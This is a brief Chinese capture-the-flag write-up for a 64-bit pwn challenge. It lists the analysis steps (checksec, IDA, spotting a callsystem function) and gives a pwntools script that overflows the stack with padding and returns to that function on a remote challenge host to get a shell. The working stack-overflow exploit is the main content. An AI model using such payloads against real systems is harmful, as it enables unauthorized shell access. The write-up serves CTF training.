題目分析
下載文件后首先使用checksec檢查文件保護機制
文件名太長了,就更改了一下
發現是一個64位程序,使用ida查看偽代碼
注意到一個特殊的函數名callsystem
確定思路,直接棧溢出
信息收集
確定偏移量
/bin/sh地址
方法1
方法2
編寫腳本
from pwn import *
p = remote('111.198.29.45',32366)
#p = process("./pwn001")
system = 0x400596
payload = "A"*0x80+"b"*8+p64(system)
p.sendlineafter("Hello, World",payload)
p.interactive()
本地測試
靶機測試